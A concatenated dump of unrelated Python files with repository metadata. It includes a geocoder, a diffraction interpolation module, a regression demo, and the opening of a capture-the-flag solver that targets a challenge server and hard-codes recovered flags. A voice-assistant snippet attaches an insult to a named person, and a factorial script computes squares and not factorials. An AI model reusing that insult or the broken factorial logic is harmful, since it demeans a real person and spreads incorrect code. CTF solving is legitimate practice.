speak("Sorry sir! I am not able to send your email at the moment")
elif 'how are you' in query:
speak("I am doing great. it's a bit hot here. What about you?")
elif 'fine' and 'good' in query:
speak("Good to know that")
elif 'thank you' in query:
speak("Thank you Masab! Have a great day")
break
elif 'dick head' in query:
speak("Ohhh! That is Sajjad Hameed")
elif 'quit' in query:
exit()
| UTF-8 | Python | false | false | 4,512 | py | 3 | Togo (Virtual Assistant).py | 2 | 0.601507 | 0.597518 | 0 | 118 | 37.169492 | 102 |
AntoineOrsoni/pyats-check-os | 9,826,885,193,664 | eec2f3ffbc28077fb36a06531e353ad65d69aca4 | 994c6471b59401647702f0dbdd7e245673c2f171 | /toolbox/pyats_diff.py | 99bcf1a9a93df5f88b252f5ad98fd6d58b5f5b47 | [
"MIT"
]
| permissive | https://github.com/AntoineOrsoni/pyats-check-os | 66ca459db5f16303435916a1d3a44428b709f945 | 3b701c49538c9669b91b50c9fce7a04aa3088044 | refs/heads/master | 2023-03-05T02:49:03.726602 | 2021-02-18T09:06:33 | 2021-02-18T09:06:33 | 300,287,444 | 7 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | from genie.utils.diff import Diff
import toolbox.database as db
import json
def compare_output_before_after(hostname, test_name):
result_before = json.loads(db.get_output_test(hostname, test_name, "before"))
result_after = json.loads(db.get_output_test(hostname, test_name, "after"))
dd = Diff(result_before, result_after, mode = 'modified')
dd.findDiff()
print(dd) | UTF-8 | Python | false | false | 389 | py | 19 | pyats_diff.py | 7 | 0.714653 | 0.714653 | 0 | 13 | 29 | 81 |
heba-ali2030/examples | 3,693,671,922,843 | 80c2c7044a0e8df3bb8d93dfc43b6f348f44dceb | 415023588927f3bd224c30ffb5059a4196d5cbf4 | /factorial_num.py | 493da8f50a35691b1c87f59c84fa61ef847ebc34 | []
| no_license | https://github.com/heba-ali2030/examples | 77ace9d857174d575c21a1361c198aef0f9e9643 | d47c314d110bc40baf5987dae887bc4ed7a05287 | refs/heads/main | 2023-03-18T18:16:02.982269 | 2021-03-11T20:52:51 | 2021-03-11T20:52:51 | 346,082,841 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #Python Program to Find the Factorial of a Number
num= int(input('choose a number to find its factorials: '))
if num== 0:
print('factorial number is one')
if num >= 1:
for i in range(1, num):
result = i*i
print(result)
print('factorials for', num)
if num < 1:
print('factorial is not defined for this number')
| UTF-8 | Python | false | false | 368 | py | 4 | factorial_num.py | 4 | 0.597826 | 0.586957 | 0 | 12 | 29.583333 | 59 |
rust84/warpcore | 14,766,097,587,921 | b08d3f72e92959f588e6f7163e9fcd7970576c32 | 26a22caedbd9276c7663ba375dc7e2037cefbff4 | /scripts/warpcore_cmd.py | 7e0778bddccc4c7cef3195e254eeb54870876024 | []
| no_license | https://github.com/rust84/warpcore | 38d3bc008d2d684aec3094728f168c7322118525 | 4300efd6903fdd18d820db99e11c8c137cfd26a7 | refs/heads/main | 2023-06-16T21:53:36.031025 | 2021-07-11T23:06:55 | 2021-07-11T23:06:55 | 384,987,820 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import serial
import os
def serialcmdw():
os.system('clear')
serialcmd = input("Enter command:")
ser.write(serialcmd.encode())
ser = serial.Serial()
os.system('clear')
ser.port = "COM5"
ser.baudrate = 9600
ser.open()
print("Example usage: <2, 160, 220, 255, 1>")
print("Parameters: <Warp Factor, Hue, Saturation, Brightness, Pattern>")
while True:
serialcmdw()
| UTF-8 | Python | false | false | 379 | py | 5 | warpcore_cmd.py | 4 | 0.680739 | 0.638522 | 0 | 19 | 18.947368 | 72 |
MayrockAndy/SchafkopfAnalyser | 13,924,284,018,898 | 9e728ad30025d998d4fd57336aeafff86077eec8 | ca1c496a71b622608fed740d1e8ffbd77434e430 | /schafkopf_analyser/__init__.py | afdd8e06b0240a37ee3b5df99d7b2604417663b9 | [
"MIT"
]
| permissive | https://github.com/MayrockAndy/SchafkopfAnalyser | b17e9f7a14930d4de1a9560ce181e160ce7a0c39 | d8d5e27f6668444083acbe1c6dc10e3dbc951ee4 | refs/heads/main | 2023-07-13T11:19:39.307955 | 2021-08-12T22:10:47 | 2021-08-12T22:10:47 | 395,332,371 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from .flask_factory import create_app
| UTF-8 | Python | false | false | 38 | py | 9 | __init__.py | 7 | 0.815789 | 0.815789 | 0 | 1 | 37 | 37 |
Fhernd/PythonEjercicios | 4,518,305,612,701 | 34f89744b88248f837c1a2efc85aff06e3815055 | b50df8a902f4e2c1ecd8667b7b97937da3371caf | /Parte002/ex1067_hackerrank_estudiantes_lectura_periodico.py | b076038f7bd0e1db97f0fb8f1bcaf207d01be89e | []
| no_license | https://github.com/Fhernd/PythonEjercicios | 5a5633855979baec89a3c257eb57aac076a7465f | 204d3d59ddeed6cbf263b23f14e950c20f81f608 | refs/heads/master | 2021-11-23T00:26:28.861302 | 2021-10-14T16:50:27 | 2021-10-14T16:50:27 | 230,629,743 | 124 | 84 | null | false | 2021-09-15T18:45:25 | 2019-12-28T15:45:28 | 2021-09-15T18:43:56 | 2021-08-21T14:22:48 | 39,577 | 39 | 32 | 1 | Python | false | false | # Ejercicio 1067: HackerRank Encontrar aquellos estudiantes que leen al menos un diario.
# Task
# The students of District College have subscriptions to English and French newspapers. Some students have subscribed only to English, some have subscribed to only French and some have subscribed to both newspapers.
# You are given two sets of student roll numbers. One set has subscribed to the English newspaper, and the other set is subscribed to the French newspaper. The same student could be in both sets. Your task is to find the total number of students who have subscribed to at least one newspaper.
# ...
if __name__ == '__main__':
m = int(input())
rolls_m = set(list(map(int, input().split())))
n = int(input())
rolls_n = set(list(map(int, input().split())))
result = rolls_m.union(rolls_n)
print(len(result))
| UTF-8 | Python | false | false | 855 | py | 124 | ex1067_hackerrank_estudiantes_lectura_periodico.py | 122 | 0.715789 | 0.711111 | 0 | 18 | 46.5 | 292 |
JimHaughwout/gadm_scan | 10,582,799,435,406 | 8dc802fb880fb9f7a4e1e75e9881027552b5b995 | 394bb1367e9d00844b6bf9f8b79563af7b6a5daa | /tools/geocode.py | 6c9ec635cdfe625d6df62a935dd943b0bd484e89 | [
"MIT"
]
| permissive | https://github.com/JimHaughwout/gadm_scan | df55b695f7a88d3be641b9576ece097db27ad308 | 1572305b6f4dda28b5fb7ad2367a63d610a8b8f3 | refs/heads/master | 2021-01-10T15:54:40.121398 | 2015-11-30T15:13:29 | 2015-11-30T15:13:29 | 46,618,319 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/env python
"""
Converting lat, long into real addresses (and back) using pygeocoder.
Slower but more robust in terms of tolerance of partial addresses
and level of formated information provided. This still makes use of
Google's geocoding API V3.
Dependency: pip install pygeocoder
: param -a : geocode address
: param -r : reverse geocode from lat-lng to address
: param -j : print full GeocoderResult object in json
To make a command line script:
- Move this file to /usr/local/bin
- Remove .py extention
- chmod +x filename
- Ensure "/usr/local/bin" is in your PATH
"""
from pygeocoder import Geocoder
import sys
from sys import argv
import json
def geocode_address(address="77 Massachusetts Avenue, Cambridge, MA"):
"""
Geocode an address query
:param string address: the address you which to encode
Result is class GeocoderResult with following useful properties:
lat, lng = result.coordinates
latitude = result.latitude
longitude = result.longitude
street_number = result.street_number
street = result.route
city = result.city
state = result.state
province = result.province
postal_code = result.postal_code
country = result.country
formatted_address = result.formatted_address
valid_address is TRUE or FALSE
"""
try:
result = Geocoder.geocode(address)
except: #Catch all exceptions
e = sys.exc_info()[1]
sys.exit("Geocoder %s for %s" % (e, address))
# Check if result is a valid address
if result.valid_address:
return result
else:
sys.exit("Error - encode_address: Address=%r is an invalid address." %
address)
return None
def geodecode_coords(lat, lng):
"""
Convert lat, long info full address of class GeocoderResult
:param float lat is latitude in degrees
:param float lng is longitude in degrees
"""
try:
# Convert to float in case you get whole value degrees
result = Geocoder.reverse_geocode(float(lat), float(lng))
except: #Catch all exceptions
e = sys.exc_info()[1]
sys.exit("Reverse Geocode %s for %r and %r." % (e, lat, lng))
return result
# Check if help options passed
help_message = '''
Usage: %s -options [args]' % argv[0]
\t-r to reverse geocode arg[2]=latitude arg[3]=longitude'
\t-a to geocode arg[2]="address to geocode"'
\t-j to produce full json output vs simple output.
'''
if (len(argv) == 1) or ('-h' in argv[1]):
print help_message
sys.exit()
# Determing encoding and output format
encoding = 'unknown'
output = 'simple'
if '-' in argv[1]:
if 'r' in argv[1]:
encoding = 'reverse'
if 'a' in argv[1]:
encoding = 'normal'
if 'j' in argv[1]:
output = 'full json'
# Get and verify input
if encoding == 'reverse':
if len(argv) != 4:
print 'Format is %s %s latitude longitude' % (argv[0], argv[1])
print 'You provided %d arguments' % len(argv)
sys.exit()
try:
lat = float(argv[2])
lng = float(argv[3])
except:
e = sys.exc_info()[0]
sys.exit('Error: Did not pass numbers for both latitude and longitude.')
if abs(lat) > 90:
sys.exit('Error: Latitude of %f is out of range [-90, 90].' % lat)
if abs(lng) > 180:
sys.exit('Error: Longitude of %f is out of range [-180, 180].' % lng)
result = geodecode_coords(lat, lng)
elif encoding == 'normal':
if len(argv) != 3:
print 'Format is %s %s "address to encode"' % (argv[0], argv[1])
print 'You provided %d arguments' % len(argv)
sys.exit()
address = argv[2]
result = geocode_address(address)
else:
print 'Could not process input, try: %s -help' % argv[0]
sys.exit()
if output == 'full json':
print json.dumps(result.raw, sort_keys=True, indent=2, separators=(',', ': '))
else:
print '\nAddress: %s' % result.formatted_address
print 'Lat, Long: %f %f' % (result.coordinates)
print 'Street Number %s' % result.street_number
print 'Street/Route: %s' % result.route
print 'Postal Code: %s' % result.postal_code
print 'Neighborhood: %s' % result.neighborhood
print 'City/Locatlity: %s' % result.city
print 'County (GADM Level 2): %s' % result.county
print 'State/Province (GADM Level 1): %s' % result.state
print 'Country: %s\n' % result.country | UTF-8 | Python | false | false | 4,108 | py | 13 | geocode.py | 6 | 0.685492 | 0.674781 | 0 | 147 | 26.952381 | 79 |
schreiber-lab/fastxq | 11,407,433,172,224 | 148b12241d47c0cc8baf9704113e83c7be8bdd74 | e7b37cc2fe813ccedc3c6899ebea97a8d55e9388 | /fastxq.py | 24523d6ecd91f57d7bcbcd7e25eddf258bdaf485 | [
"MIT"
]
| permissive | https://github.com/schreiber-lab/fastxq | a02c4523b44019463cbd8dfd0952a6c2d1764e5d | c5048b2b8714a1416ef7f33f8df22307cbebbf8a | refs/heads/master | 2023-04-12T18:30:09.640274 | 2022-08-22T18:05:45 | 2022-08-22T18:05:45 | 527,681,414 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import cv2 as cv
__author__ = 'Vladimir Starostin'
__email__ = 'vladimir.starostin@uni-tuebingen.de'
__version__ = '0.0.1'
__all__ = [
'QInterpolation',
'PolarInterpolation',
'convert_img',
'get_detector_q_grid',
'get_detector_polar_grid',
]
class QInterpolation(object):
def __init__(self,
q_xy_max: float,
q_z_max: float,
q_xy_size: int,
q_z_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
algorithm: int = cv.INTER_LINEAR,
flip_y: bool = False,
flip_z: bool = False,
):
self._init_config(
y0=y0,
z0=z0,
wavelength=wavelength,
distance=distance,
pixel_size=pixel_size,
incidence_angle=incidence_angle,
q_xy_max=q_xy_max,
q_z_max=q_z_max,
q_xy_size=q_xy_size,
q_z_size=q_z_size,
)
self._flip_y, self._flip_z = flip_y, flip_z
self._algorithm = algorithm
self._xy, self._zz = self._get_grid()
if self._algorithm not in (cv.INTER_LINEAR, cv.INTER_CUBIC, cv.INTER_LANCZOS4):
self._algorithm = cv.INTER_LINEAR
def _init_config(self, **kwargs):
self._config = dict(kwargs)
def _get_grid(self):
return get_detector_q_grid(**self._config)
def __call__(self, img: np.ndarray):
img = self.flip(img)
return convert_img(img, self._xy, self._zz, self._algorithm)
def flip(self, img: np.ndarray):
if self._flip_y:
img = np.flip(img, 1)
if self._flip_z:
img = np.flip(img, 0)
return img
def __repr__(self):
kwargs = ', '.join(f'{k}={str(v)}' for k, v in self._config.items())
return f'{self.__class__.__name__}({kwargs})'
class PolarInterpolation(QInterpolation):
def __init__(self,
q_xy_max: float,
q_z_max: float,
polar_q_size: int,
polar_angular_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
algorithm: int = cv.INTER_LINEAR,
flip_y: bool = False,
flip_z: bool = False,
):
super().__init__(
q_xy_max, q_z_max, polar_q_size, polar_angular_size, y0, z0, incidence_angle, wavelength, distance,
pixel_size, algorithm, flip_y, flip_z,
)
def _init_config(self, **kwargs):
kwargs['polar_q_size'] = kwargs.pop('q_xy_size')
kwargs['polar_angular_size'] = kwargs.pop('q_z_size')
self._config = dict(kwargs)
def _get_grid(self):
return get_detector_polar_grid(**self._config)
def convert_img(img: np.ndarray, xy: np.ndarray, zz: np.ndarray, algorithm: int = cv.INTER_LINEAR):
return cv.remap(img.astype(np.float32), xy.astype(np.float32), zz.astype(np.float32), algorithm)
def get_detector_q_grid(
q_xy_max: float,
q_z_max: float,
q_xy_size: int,
q_z_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
):
q_xy, q_z = _get_q_grid(q_xy_max=q_xy_max, q_z_max=q_z_max, q_xy_size=q_xy_size, q_z_size=q_z_size)
xy, zz = _get_detector_grid(
q_xy=q_xy,
q_z=q_z,
y0=y0,
z0=z0,
incidence_angle=incidence_angle,
wavelength=wavelength,
distance=distance,
pixel_size=pixel_size,
)
return xy, zz
def get_detector_polar_grid(
q_xy_max: float,
q_z_max: float,
polar_q_size: int,
polar_angular_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
):
q_xy, q_z = _get_q_polar_grid(q_xy_max, q_z_max, polar_q_size, polar_angular_size)
xy, zz = _get_detector_grid(
q_xy=q_xy,
q_z=q_z,
y0=y0,
z0=z0,
incidence_angle=incidence_angle,
wavelength=wavelength,
distance=distance,
pixel_size=pixel_size,
)
return xy, zz
def _get_detector_grid(
q_xy: np.ndarray,
q_z: np.ndarray,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
):
k = 2 * np.pi / wavelength
d = distance / pixel_size
q_xy, q_z = q_xy / k, q_z / k
q2 = q_xy ** 2 + q_z ** 2
norm = d / (1 - q2 / 2)
alpha = np.pi / 180 * incidence_angle
sin, cos = np.sin(alpha), np.cos(alpha)
zz = (norm * (q_z - sin) + d * sin) / cos
yy2 = norm ** 2 - zz ** 2 - d ** 2
yy2[yy2 < 0] = np.nan
yy = np.sqrt(yy2)
zz += z0
yy += y0
return yy, zz
def _get_q_grid(q_xy_max: float, q_z_max: float, q_xy_size: int, q_z_size: int):
q_xy = np.linspace(0, q_xy_max, q_xy_size)
q_z = np.linspace(0, q_z_max, q_z_size)
q_xy, q_z = np.meshgrid(q_xy, q_z)
return q_xy, q_z
def _get_q_polar_grid(q_xy_max: float, q_z_max: float, polar_q_size: int, polar_angular_size: int):
q_max = np.sqrt(q_xy_max ** 2 + q_z_max ** 2)
r = np.linspace(0, q_max, polar_q_size)
phi = np.linspace(0, np.pi / 2, polar_angular_size)
rr, pp = np.meshgrid(r, phi)
q_z = rr * np.sin(pp)
q_xy = rr * np.cos(pp)
return q_xy, q_z
| UTF-8 | Python | false | false | 5,823 | py | 6 | fastxq.py | 4 | 0.509359 | 0.498369 | 0 | 221 | 25.348416 | 111 |
probml/pyprobml | 9,363,028,745,697 | e73713446c7ea76e924275033761eabb45d8f89f | b2bcf07493b5a1bbfb7e29c7f13ac0b380cefead | /deprecated/scripts/boston_housing.py | 86328b192b7e0e26e60245dc1684acbc4c8f0750 | [
"MIT"
]
| permissive | https://github.com/probml/pyprobml | e1952927bceec676eb414f9342470ba4b8e6703b | 9cc22f3238ae092c2b9bff65d6283c93d38d25d4 | refs/heads/master | 2023-08-31T07:36:11.603301 | 2023-08-13T02:47:12 | 2023-08-13T02:47:12 | 65,924,871 | 6,263 | 1,598 | MIT | false | 2023-01-20T23:34:23 | 2016-08-17T16:42:24 | 2023-01-19T23:55:44 | 2023-01-20T23:34:22 | 5,242,676 | 5,374 | 1,280 | 34 | Jupyter Notebook | false | false | # Boston housing demo
import superimport
import numpy as np
import matplotlib.pyplot as plt
import os
figdir = "../figures"
def save_fig(fname): plt.savefig(os.path.join(figdir, fname))
import pandas as pd
import sklearn.datasets
import sklearn.linear_model as lm
from sklearn.model_selection import train_test_split
# Prevent numpy from printing too many digits
np.set_printoptions(precision=3)
# Load data (creates numpy arrays)
boston = sklearn.datasets.load_boston()
X = boston.data
y = boston.target
# Convert to Pandas format
df = pd.DataFrame(X)
df.columns = boston.feature_names
df['MEDV'] = y.tolist()
df.describe()
# plot marginal histograms of each column (13 features, 1 response)
df.hist()
plt.show()
# scatter plot of response vs each feature
nrows = 3; ncols = 4;
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, sharey=True, figsize=[15, 10])
plt.tight_layout()
plt.clf()
for i in range(0,12):
plt.subplot(nrows, ncols, i+1)
plt.scatter(X[:,i], y)
plt.xlabel(boston.feature_names[i])
plt.ylabel("house price")
plt.grid()
save_fig("boston-housing-scatter.pdf")
plt.show()
# Rescale input data
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.33, random_state=42)
scaler = sklearn.preprocessing.StandardScaler()
scaler = scaler.fit(X_train)
Xscaled = scaler.transform(X_train)
# equivalent to Xscaled = scaler.fit_transform(X_train)
# Fit model
linreg = lm.LinearRegression()
linreg.fit(Xscaled, y_train)
# Extract parameters
coef = np.append(linreg.coef_, linreg.intercept_)
names = np.append(boston.feature_names, 'intercept')
print([name + ':' + str(round(w,1)) for name, w in zip(names, coef)])
"""
['CRIM:-1.0', 'ZN:0.9', 'INDUS:0.4', 'CHAS:0.9', 'NOX:-1.9', 'RM:2.8', 'AGE:-0.4',
'DIS:-3.0', 'RAD:2.0', 'TAX:-1.4', 'PTRATIO:-2.1', 'B:1.0', 'LSTAT:-3.9', 'intercept:23.0']
"""
# Assess fit on test set
Xscaled = scaler.transform(X_test)
ypred = linreg.predict(Xscaled)
plt.figure()
plt.scatter(y_test, ypred)
plt.xlabel("true price")
plt.ylabel("predicted price")
mse = sklearn.metrics.mean_squared_error(y_test, ypred)
plt.title("Boston housing, rmse {:.2f}".format(np.sqrt(mse)))
xs = np.linspace(min(y), max(y), 100)
plt.plot(xs, xs, '-')
save_fig("boston-housing-predict.pdf")
plt.show()
| UTF-8 | Python | false | false | 2,283 | py | 1,255 | boston_housing.py | 518 | 0.696452 | 0.673237 | 0 | 91 | 24.076923 | 91 |
Farzan64n/gan-elements | 2,972,117,409,013 | cee21b6d50ab146dcb6ed673288c5228900ef185 | 7d2e8afb603b3d49ca246350e6f670bd3eb5a311 | /wgangp/models.py | ad0bafc75e74540b90bc5db6080ea82a45412e8a | [
"MIT"
]
| permissive | https://github.com/Farzan64n/gan-elements | b3b3de60ccbcd4c6b1c8b653b1e66aa3b80781da | 01499be9a6ed75319c1bc7ee5681041579dc3ee0 | refs/heads/master | 2022-04-04T06:47:07.996921 | 2020-01-24T21:37:09 | 2020-01-24T21:37:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from tensorflow.keras.layers import BatchNormalization, Conv2D, Dense
from tensorflow.keras.layers import Input, Flatten, LeakyReLU, Reshape
from tensorflow.keras.layers import UpSampling2D
from tensorflow.keras.models import Model
def dcgan_disc(img_shape=(32,32,1)):
# Adapted from:
# https://github.com/eriklindernoren/Keras-GAN/blob/master/dcgan/dcgan.py
def conv_block(channels, strides=2):
def block(x):
x = Conv2D(channels, kernel_size=3, strides=strides,
padding="same")(x)
x = LeakyReLU(0.2)(x)
return x
return block
image_in = Input(shape=img_shape, name="sample_in")
x = conv_block(64, strides=1)(image_in)
x = conv_block(128)(x)
x = conv_block(256)(x)
x = Flatten()(x)
disc_out = Dense(1, activation="linear")(x)
model = Model(inputs=image_in, outputs=disc_out)
return model
def dcgan_gen(img_shape=(32,32,1), noise_dim=64):
# Adapted from:
# https://github.com/eriklindernoren/Keras-GAN/blob/master/dcgan/dcgan.py
def up_block(channels):
def block(x):
x = UpSampling2D()(x)
x = Conv2D(channels, kernel_size=3, padding="same")(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(0.2)(x)
return x
return block
noise_in = Input(shape=(noise_dim,), name="noise_in")
initial_shape = (img_shape[0]//4, img_shape[1]//4, 256)
x = Dense(np.prod(initial_shape))(noise_in)
x = LeakyReLU(0.2)(x)
x = Reshape(initial_shape)(x)
x = up_block(128)(x)
x = up_block(64)(x)
img_out = Conv2D(img_shape[-1], kernel_size=3, padding="same",
activation="tanh")(x)
return Model(inputs=noise_in, outputs=img_out)
| UTF-8 | Python | false | false | 1,782 | py | 12 | models.py | 11 | 0.62009 | 0.590348 | 0 | 57 | 30.263158 | 77 |
graphcore/popart | 893,353,230,394 | c7165a9d5edd133f71462bda6cda520eb1200f43 | 7d93616b09afdd38ba25f70bf56e84d92d16f8e1 | /tests/unittests/python/popart._internal.ir/bindings/test_graphid.py | c156802562eaf9dd16f5bf775c5d327c71d7986d | [
"MIT",
"BSL-1.0",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | https://github.com/graphcore/popart | ac3c71617c5f0ac5dadab179b655f6b2372b453d | efa24e27f09b707865326fe4a30f4a65b7a031fe | refs/heads/sdk-release-3.0 | 2023-07-08T08:36:28.342159 | 2022-09-23T12:22:35 | 2022-09-23T15:10:23 | 276,412,857 | 73 | 13 | NOASSERTION | false | 2022-09-29T12:13:40 | 2020-07-01T15:21:50 | 2022-09-20T10:27:49 | 2022-09-29T12:13:39 | 22,515 | 64 | 6 | 3 | C++ | false | false | # Copyright (c) 2021 Graphcore Ltd. All rights reserved.
import itertools
import popart._internal.ir as _ir
def test_graphid_construction():
"""Test that we can construct a popart._internal.ir.GraphId object."""
_ = _ir.GraphId("g")
def test_graphid_operator_lt():
"""Test the < operator."""
for xstr, ystr in itertools.product(["g1", "g2", "y7", "z123"], repeat=2):
x = _ir.GraphId(xstr)
y = _ir.GraphId(ystr)
x_le_y = x < y
y_le_x = y < x
# We can't violate assymetry
assert not (x_le_y and y_le_x)
if xstr == ystr:
# Expect irreflexivity: neither x < y or y < x
assert (not x_le_y) and (not y_le_x)
else:
# Expect totality: one of x < y or y < x
assert x_le_y or y_le_x
def test_graphid_operator_eq_and_neq():
"""Test the == and != operators."""
for xstr, ystr in itertools.product(["g1", "g2", "y7", "z123"], repeat=2):
x = _ir.GraphId(xstr)
y = _ir.GraphId(ystr)
if xstr == ystr:
assert x == y
assert not (x != y)
else:
assert not (x == y)
assert x != y
def test_graphid_str():
"""Test GraphId.str() returns the ID as a string."""
id1 = _ir.GraphId("g1")
assert id1.str() == "g1"
id2 = _ir.GraphId("foobar")
assert id2.str() == "foobar"
| UTF-8 | Python | false | false | 1,392 | py | 2,412 | test_graphid.py | 2,241 | 0.531609 | 0.514368 | 0 | 52 | 25.769231 | 78 |
dream-developer/project-selenium | 17,076,789,991,551 | b18ff04ec8f74ab9ad7384661a0296d4eede7655 | d4700f720c27d6a49fb624f1d0efb013828abe19 | /python/selenium_screenshot.py | 2ffadaf752d27b4efdbe203dcb8a19234c77a364 | []
| no_license | https://github.com/dream-developer/project-selenium | d7cf4fa392bc41933589d11f72e9e1ccca5f1532 | 066895c54b168a1616d568ae8f1da09c597ee195 | refs/heads/master | 2023-04-29T19:11:26.038941 | 2020-07-01T11:34:42 | 2020-07-01T11:34:42 | 265,194,479 | 4 | 8 | null | false | 2023-04-24T07:56:18 | 2020-05-19T08:48:29 | 2023-04-23T16:19:02 | 2023-04-24T07:56:08 | 12 | 4 | 9 | 0 | Python | false | false | # -*- coding: utf-8 -*-
from selenium import webdriver
import time
url = "file:///C:/Users/writer/study_work/html/javascript.html"
driver = webdriver.Chrome()
driver.get(url)
driver.save_screenshot("screenshot.png")
time.sleep(3)
driver.quit()
| UTF-8 | Python | false | false | 253 | py | 37 | selenium_screenshot.py | 26 | 0.70751 | 0.699605 | 0 | 9 | 26.111111 | 63 |
Twiske/AdventOfCode2015 | 9,208,409,884,023 | db08237e0265a74eacb0e480135601abc5959377 | ad610ea4f56cee872781c126a874bde412026913 | /8/8.py | 00b622e0cbfbef0602fdcd70c03a031efbee25de | []
| no_license | https://github.com/Twiske/AdventOfCode2015 | 3d609e33c99e0739027c624731d1c0b0bc00a261 | 1096f2edc06544981b64222200bba164251dd472 | refs/heads/master | 2021-01-10T15:21:20.762839 | 2015-12-26T22:35:58 | 2015-12-26T22:35:58 | 48,625,304 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import sys
import re
stringRegex = re.compile('"(.*?)"')
for line in sys.stdin:
internalString = stringRegex.search(line).groups()[0]
processedString = bytes(internalString, "utf-8").decode("unicode_escape")
print(len(processedString))
print(len(line))
#print(len(raw(line))) | UTF-8 | Python | false | false | 321 | py | 9 | 8.py | 7 | 0.682243 | 0.672897 | 0 | 12 | 24.916667 | 75 |
xeroc/vanteem | 1,348,619,753,822 | 757a905a30565fb452660017cc5abf456d775c5a | 294a83961324b1cc42dfa5267a31330c95b956ae | /setup.py | 28c253c5468b4313005cd55195b2fc79cc1aac74 | []
| no_license | https://github.com/xeroc/vanteem | 518d361724b6a25d1169b17c22d8e8f412e2956e | fbea8f32a1b7a10673242dbffb9d0d6717102550 | refs/heads/master | 2017-05-02T20:48:39.255096 | 2016-04-28T11:09:24 | 2016-04-28T11:09:24 | 57,294,289 | 6 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
from setuptools import setup
VERSION = '0.0.1'
setup(name='vanteem',
version=VERSION,
description='Python based blog software with posts stored on the STEEM blockchain',
long_description=open('README.md').read(),
download_url='https://github.com/xeroc/vanteem/tarball/' + VERSION,
author='Fabian Schuh',
author_email='<Fabian@BitShares.eu>',
maintainer='Fabian Schuh',
maintainer_email='<Fabian@BitShares.eu>',
url='http://www.github.com/xeroc/vanteem',
keywords=['steem', 'blog', 'blockchain'],
packages=["vanteem"],
classifiers=['License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
],
entry_points={
'console_scripts': [
'vanteem = vanteem.__main__:main',
],
},
install_requires=["steem",
"python-frontmatter",
"jinja2",
"flask",
"Flask-Scss",
"markdown",
"pymdown-extensions",
"flask-runner",
],
include_package_data=True,
)
| UTF-8 | Python | false | false | 1,412 | py | 15 | setup.py | 3 | 0.5 | 0.495751 | 0 | 40 | 34.3 | 89 |
RocketDonkey/wargames | 1,683,627,226,790 | 5ac28d7c8245929b2b701951a189f4f15d37b995 | 38edafb83f2265e00aaaaec5697617b4ac6f5f14 | /christmas_challenge/christmas_challenge.py | c67833da61b84106487aa62ec6191707b6b4b6d6 | []
| no_license | https://github.com/RocketDonkey/wargames | dba8a0f86e9c358c7a0f0b8df17392315d139b11 | 757b0f94fc3bba11cee8ef5b42469a7eefb56eb4 | refs/heads/master | 2021-01-18T22:36:53.937291 | 2016-05-15T10:05:16 | 2016-05-15T10:05:16 | 30,543,160 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """c01db33f Christmas Challenge.
This challenge involves logging into the server at 0wn.b33f.me and recovering
the keys from the service.
* Flag 1: Encrypted response can be reversed to find the flag.
* Flag 2: Execute a FORTRAN program.
* Flag 3: (not solved)
"""
import socket
import struct
import sys
# This is the response required for determining the crypto.
ENCRYPTED_RESPONSE = """\
To enhance the security of our members, we have implemented a what-the-factor \
authentication system. If you haven't yet received your passphrase or are \
having issues using your issued prng token, please contact member support.
I need your passphrase, sir?
"""
# Utility functions.
def ListToHex(list_):
list_ = int(''.join(list_).encode('hex'), 16)
return int(struct.pack('<L', list_).encode('hex'), 16)
def ROL(byte, count):
"""Implementation of the x86 rol instruction."""
return ((byte << count) | (byte >> (32 - count))) & 0xffffffff
def LittleEndian(input_string):
"""Convert a byte string into its little Endian equivalent."""
return int(
struct.pack('<L', int(input_string.encode('hex'), 16)).encode('hex'), 16)
class ChristmasChallenge(object):
"""Interact with http://0wn.b33f.me/ and get the treasures."""
def __init__(self):
"""Instantiate the connection."""
self.encrypt_array = []
self.edx_counter = 0
self.ecx_counter = 1
# Some things behave differently locally.
self.local = True
if self.local:
self._sock = socket.create_connection(('0.0.0.0', 9989))
self.flag_1 = 'CHRISTMAS{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}\n'
self.flag_2 = 'CHRISTMAS{BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB}\n'
else:
self._sock = socket.create_connection(('162.243.220.222', 9989))
self.flag_1 = 'CHRISTMAS{mY_crYpt0_sucks_aNd_1_shoU1d_b3_4shaMed}\n'
self.flag_2 = 'CHRISTMAS{h4cKing_l1ek_it5_1956_all_0v3r_aGa1n}\n'
def InitArrays(self):
"""This is used only for testing and is not required on the live version."""
# Starting 4-byte /dev/urandom key.
self.starting_key = int(raw_input('Enter value: '), 16)
# The constant 0x2e1832af at memory address 0x804e220 is XOR'd with the key.
# 0x804b937 xor DWORD PTR [ebx+0x124],esi
self.xor_const = 0x2e1832af ^ self.starting_key
# The key is then AND'd with a constant 0xFF0. This becomes the value that is
# checked during the LOOP below. This is at most 4080 (0xFF0).
self.loop_iterations = self.starting_key & 0xFF0
# Following the CHRISTMAS{A*39} string, there are additional junk bytes that are
# used when calculating the hash. Note that the final four-byte sequence is
# actually determined based on the key value.
self._array_bytes = [
0x49524843, 0x414d5453, 0x41417b53, 0x41414141,
